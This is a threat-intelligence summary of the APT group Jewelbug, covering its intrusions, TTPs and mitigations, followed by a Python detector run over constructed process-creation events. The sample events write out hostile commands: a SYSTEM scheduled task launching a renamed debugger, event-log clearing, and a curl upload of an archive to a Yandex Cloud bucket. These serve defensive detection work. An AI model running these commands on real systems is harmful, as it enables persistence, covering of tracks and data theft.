Russian IT company among group’s latest targets. Attackers may have been attempting to target the company’s customers in Russia with a software supply chain attack.
Analysis Summary
# Threat Actor: Jewelbug
## Attribution & Identity
Chinese APT group.
**Known Aliases:** REF7707, CL-STA-0049, Earth Alux.
## Activity Summary
Jewelbug has been highly active recently, targeting organizations across South America, South Asia, Taiwan, and notably, Russia.
- **Russian IT Service Provider Intrusion (Jan - May 2025):** The group maintained access to a Russian IT service provider's network for five months, gaining access to a source code repository and software build systems, which suggests an attempt to execute a supply chain attack against the provider's Russian customers.
- **South American Government Intrusion (Sep 2024 - Jul 2025):** Activity observed over several periods, including deployment of a new, likely still-in-development backdoor in July 2025.
- Compromised the networks of a Taiwanese company and an IT provider in South Asia.
- The targeting of a Russian entity continues a recent trend of Chinese groups targeting Russia, suggesting an adversarial stance following Russia’s invasion of Ukraine.
## Tactics, Techniques & Procedures
- **Binary Masquerading/Use of Benign Binaries:** Use of a renamed copy of `cdb.exe` (Microsoft Console Debugger) as `7zup.exe`. CDB is used to run shellcode, bypass application whitelisting, launch executables, and terminate security solutions.
- **Persistence:** Utilizing scheduled tasks (e.g., `schtasks /create /tn "GetEvent" ...`) for persistence and privilege escalation.
- **Credential Access:** Credential dumping observed.
- **Defense Evasion:** Clearing Windows Event Logs (`wevtutil cl ...`).
- **Lateral Movement:** Use of SMBExec tool.
- **C2/Exfiltration:** DLL sideloading was leveraged; BITSAdmin and the `curl` tool were used for potential data exfiltration.
- **Supply Chain Compromise:** Targeting build systems and code repositories to infect downstream customers.
- **Tool Use:** Deployment of the 7-Zip archive manager to pack files prior to exfiltration.
- **Use of Legitimate Software:** Use of AnyDesk remote management software.
- **New Backdoor:** Deployment of a new backdoor leveraging Microsoft Graph API and OneDrive for Command and Control (C&C).
## Targeting
- **Sectors:** IT Service Providers, Government organizations.
- **Geography:** South America, South Asia, Taiwan, Russia.
- **Victims:** A Russian IT service provider, a large South American government organization, a Taiwanese company, and an IT provider in South Asia.
## Tools & Infrastructure
- **Malware Families Used:** New backdoor leveraging Microsoft Graph API/OneDrive (C&C).
- **Infrastructure:**
- Exfiltration destination: Yandex Cloud (chosen to avoid suspicion within Russia).
- C2: Microsoft Graph API and OneDrive (used by the new backdoor).
- **Specific Files/Commands:** `7zup.exe` (renamed `cdb.exe`), SMBExec, `yandex2.exe` (exfiltration sample).
## Implications
Jewelbug demonstrates capability in sophisticated infrastructure targeting, pivoting from traditional espionage to potentially disruptive supply chain operations aimed at Russian entities. Its use of Yandex Cloud as an exfiltration destination suggests an adaptive tactic to blend into the Russian digital environment. The dynamics between Chinese and Russian actors suggest this targeting may persist or escalate.
## Mitigations
- Block the execution of benign Microsoft signed binaries like CDB (cdb.exe) unless explicitly required and whitelisted for specific users.
- Monitor for the creation of persistence mechanisms via scheduled tasks, especially those creating high-privilege entries.
- Scrutinize data exfiltration targeting cloud services popular within the local environment (e.g., Yandex Cloud in Russia).
- Implement controls to monitor/block DLL sideloading attempts.
- Harden build systems and code repositories against compromise to prevent supply chain attacks.
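As an added example that is not code from the report or from its analysts, the following Python implements the monitoring items above against the behaviours listed under Tactics, Techniques & Procedures, run over constructed process-creation records (Sysmon Event ID 1 style field names: `Image`, `OriginalFileName`, `CommandLine`, `User`). It matches CDB on the `OriginalFileName` carried in the binary's version resource rather than on the on-disk name, so the `7zup.exe` rename does not hide it; flags `schtasks /create` entries that run as SYSTEM or at the highest run level; flags `wevtutil cl`; and flags BITSAdmin transfers and `curl` uploads, tagging destinations in a cloud domain that is unremarkable locally. The sample events, the allow-list, the `yandexcloud.net` suffix and the field names are all assumptions for illustration, not indicators from the report.

```python
"""Detection logic for the Jewelbug TTPs summarized on this page, run over
constructed process-creation records. Sample events, allow-list and the
watched cloud domain are assumptions, not indicators from the report."""
from __future__ import annotations
import shlex
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Accounts permitted to run the Console Debugger (assumption: one named service account).
CDB_ALLOWED_USERS = {r"CORP\debug-svc"}
# Cloud storage domain that blends into local traffic (assumption: Yandex Cloud's
# public domain; adjust to whatever is "normal" in your environment).
WATCHED_CLOUD_SUFFIXES = ("yandexcloud.net",)
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}


def _base(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def _argv(cmdline: str) -> list[str]:
    # posix=False keeps backslashes literal; surrounding quotes are stripped afterwards.
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def _opt(tokens: list[str], flag: str):
    """Value following a flag such as /ru, or None if the flag is absent."""
    try:
        return tokens[tokens.index(flag) + 1]
    except (ValueError, IndexError):
        return None


def _dest_host(argv: list[str]) -> str:
    for tok in argv:
        if tok.lower().startswith(("http://", "https://")):
            return urlsplit(tok).hostname or ""
    return ""


def check_event(ev: dict) -> list[str]:
    """Return alert strings for one process-creation event (empty list = nothing seen)."""
    alerts: list[str] = []
    image = _base(ev.get("Image", ""))
    orig = ev.get("OriginalFileName", "").lower()
    argv = _argv(ev.get("CommandLine", ""))
    low = [tok.lower() for tok in argv]
    user = ev.get("User", "")

    # Masquerading: key on the signed OriginalFileName, so a renamed copy still matches,
    # and alert on any run by an account outside the allow-list.
    if orig == "cdb.exe":
        if image != "cdb.exe":
            alerts.append(f"masquerade: cdb.exe running as {image}")
        if user not in CDB_ALLOWED_USERS:
            alerts.append(f"cdb.exe executed by non-allowlisted account {user}")

    # Persistence / privilege escalation: task created to run as SYSTEM or at highest level.
    if image == "schtasks.exe" and "/create" in low:
        run_as = _opt(low, "/ru") or ""
        if run_as in ("system", r"nt authority\system") or _opt(low, "/rl") == "highest":
            alerts.append(f"high-privilege scheduled task created: /tn {_opt(argv, '/tn')}")

    # Defense evasion: event log clearing.
    if image == "wevtutil.exe" and any(tok in ("cl", "clear-log") for tok in low):
        alerts.append(f"event log cleared: {_opt(low, 'cl') or _opt(low, 'clear-log')}")

    # Exfiltration: BITS transfer or curl upload; note when the destination is a
    # cloud service that would not look out of place in local traffic.
    upload = (image == "bitsadmin.exe" and "/transfer" in low) or \
             (image == "curl.exe" and CURL_UPLOAD_FLAGS.intersection(argv))
    if upload:
        host = _dest_host(argv)
        tag = "watched cloud" if host.endswith(WATCHED_CLOUD_SUFFIXES) else "external"
        alerts.append(f"{image} upload to {tag} host {host or '<none>'}")
    return alerts


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run check_event over every record; returns (event index, alert) pairs."""
    return [(i, a) for i, ev in enumerate(events) for a in check_event(ev)]


# Constructed sample telemetry: four suspicious records and two benign ones.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\7zup.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": r'"C:\Users\Public\7zup.exe" -cf C:\Users\Public\run.txt', "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn "GetEvent" /tr C:\Users\Public\7zup.exe /sc minute /mo 10 /ru SYSTEM',
     "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\wevtutil.exe", "OriginalFileName": "wevtutil.exe",
     "CommandLine": "wevtutil cl Security", "User": r"CORP\jdoe"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl -T C:\Users\Public\out.7z https://storage.yandexcloud.net/bkt/out.7z", "User": r"CORP\jdoe"},
    {"Image": r"C:\Program Files\Windows Kits\10\Debuggers\x64\cdb.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": "cdb.exe -p 4242", "User": r"CORP\debug-svc"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe notes.txt", "User": r"CORP\jdoe"},
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {alert}")
```

On real telemetry the same rules apply unchanged to Sysmon or EDR process-creation events; the one design point worth keeping is that the CDB rule keys on the signed original filename, which is also what an AppLocker or WDAC publisher rule matches, so the block-and-allowlist mitigation above and this detection agree on what counts as CDB.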